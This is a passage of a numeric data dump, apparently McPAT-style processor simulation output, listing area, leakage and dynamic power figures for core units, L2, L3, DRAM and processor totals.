'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.237057,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.382365,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.193005,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.812427,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.271124,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.3535,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00994325,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0719021,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0735364,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0719021,
'Execution Unit/Register Files/Runtime Dynamic': 0.0834797,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.151478,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.451428,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.9554,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00195622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00195622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00174089,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000694174,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105636,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00670969,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0174334,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0706924,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.49665,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.238337,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.240103,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.93339,
'Instruction Fetch Unit/Runtime Dynamic': 0.573276,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0562062,
'L2/Runtime Dynamic': 0.0159433,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.56969,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.14185,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0754641,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.075464,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.92604,
'Load Store Unit/Runtime Dynamic': 1.58948,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.186082,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.372163,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.066041,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0668819,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.279585,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0390807,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.549141,
'Memory Management Unit/Runtime Dynamic': 0.105963,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.4078,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106954,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.123347,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.134042,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.3741,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.239923,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.386987,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.195338,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.822248,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.274404,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.35992,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0100634,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0727718,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0744254,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0727718,
'Execution Unit/Register Files/Runtime Dynamic': 0.0844888,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.15331,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.45823,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.97303,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00195125,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00195125,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0017352,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000691234,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00106913,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00670683,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.017434,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.071547,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.551,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.238625,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.243006,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.99039,
'Instruction Fetch Unit/Runtime Dynamic': 0.577319,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0578399,
'L2/Runtime Dynamic': 0.0162495,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.60772,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.16145,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0766944,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0766945,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.96988,
'Load Store Unit/Runtime Dynamic': 1.61638,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.189115,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.378231,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0671177,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0679836,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.282965,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0391273,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.55437,
'Memory Management Unit/Runtime Dynamic': 0.107111,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.5219,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0108247,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.124893,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.135718,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.42581,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.3390361895736473,
'Runtime Dynamic': 1.3390361895736473,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.281523,
'Runtime Dynamic': 0.180024,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.9895,
'Peak Power': 116.102,
'Runtime Dynamic': 19.4683,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 82.708,
'Total Cores/Runtime Dynamic': 19.2883,
'Total Cores/Subthreshold Leakage': 24.7074,
